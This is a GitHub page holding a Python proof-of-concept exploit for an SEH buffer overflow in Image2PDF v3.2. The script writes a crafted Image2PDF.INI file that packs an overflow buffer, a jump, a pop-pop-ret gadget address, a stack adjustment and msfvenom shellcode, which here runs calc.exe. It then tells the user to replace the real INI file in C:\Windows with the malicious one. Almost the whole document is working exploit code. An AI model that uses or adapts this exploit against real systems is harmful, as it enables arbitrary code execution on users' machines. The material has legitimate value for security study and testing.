-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathImage2PDF-seh-poc.py
69 lines (58 loc) · 2.11 KB
/
Image2PDF-seh-poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
# Image2PDF v3.2
# Buffer overflow SEH PoC
# Tested: Win 7 x86 / Win 8.1 x86
# Reference: original exploit by Robbie Corley
# https://www.exploit-db.com/exploits/38423/
FILE = 'Image2PDF.INI'
MAXBUFFERSIZE = 3000
OFFSET = 2972 # Win7 SP1
#OFFSET = 2958 # XP SP3
ppr = '\xF2\xA8\x7C\x69' # Pop Pop Ret 697CA8F2
jmp = '\xeb\x06\x90\x90' # jmp $+6
# Adjust esp-1500
movesp = '\x81\xc4\x24\xfa\xff\xff'
# msfvenom -p windows/exec cmd="calc.exe" -f python -b '\x00\x0a\x0d\x40' -s 626
buf = ""
buf += "\xd9\xce\xbb\x67\xa7\x27\xf9\xd9\x74\x24\xf4\x5f\x31"
buf += "\xc9\xb1\x31\x31\x5f\x18\x83\xc7\x04\x03\x5f\x73\x45"
buf += "\xd2\x05\x93\x0b\x1d\xf6\x63\x6c\x97\x13\x52\xac\xc3"
buf += "\x50\xc4\x1c\x87\x35\xe8\xd7\xc5\xad\x7b\x95\xc1\xc2"
buf += "\xcc\x10\x34\xec\xcd\x09\x04\x6f\x4d\x50\x59\x4f\x6c"
buf += "\x9b\xac\x8e\xa9\xc6\x5d\xc2\x62\x8c\xf0\xf3\x07\xd8"
buf += "\xc8\x78\x5b\xcc\x48\x9c\x2b\xef\x79\x33\x20\xb6\x59"
buf += "\xb5\xe5\xc2\xd3\xad\xea\xef\xaa\x46\xd8\x84\x2c\x8f"
buf += "\x11\x64\x82\xee\x9e\x97\xda\x37\x18\x48\xa9\x41\x5b"
buf += "\xf5\xaa\x95\x26\x21\x3e\x0e\x80\xa2\x98\xea\x31\x66"
buf += "\x7e\x78\x3d\xc3\xf4\x26\x21\xd2\xd9\x5c\x5d\x5f\xdc"
buf += "\xb2\xd4\x1b\xfb\x16\xbd\xf8\x62\x0e\x1b\xae\x9b\x50"
buf += "\xc4\x0f\x3e\x1a\xe8\x44\x33\x41\x66\x9a\xc1\xff\xc4"
buf += "\x9c\xd9\xff\x78\xf5\xe8\x74\x17\x82\xf4\x5e\x5c\x7c"
buf += "\xbf\xc3\xf4\x15\x66\x96\x45\x78\x99\x4c\x89\x85\x1a"
buf += "\x65\x71\x72\x02\x0c\x74\x3e\x84\xfc\x04\x2f\x61\x03"
buf += "\xbb\x50\xa0\x60\x5a\xc3\x28\x49\xf9\x63\xca\x95"
# Buffer
fill1 = 'A' * OFFSET + jmp + ppr + movesp + buf + '\x90' * (MAXBUFFERSIZE - OFFSET - 8 - len(buf) - len(movesp))
buffer = fill1
ini = """[SaveMode]
m_iMakePDFMode=0
m_iSaveMode=0
m_szFilenameORPath=
m_iDestinationMode=0
m_bAscFilename=0
m_strFileNumber=0001
[BaseSettingDlg]
m_bCheckDespeckle=0
m_bCheckSkewCorrect=0
m_bCheckView=0
m_szDPI=default
m_bCheckBWImage=1
[SetPDFInfo]
m_szAuthor=
m_szSubject=
m_szTitle="""
ini = ini + buffer
print ('Creating %s file...' % FILE)
f = open(FILE,'w')
f.write(ini)
f.close()
print ('Overwrite the original %s in C:\Windows folder with the evil one' % FILE)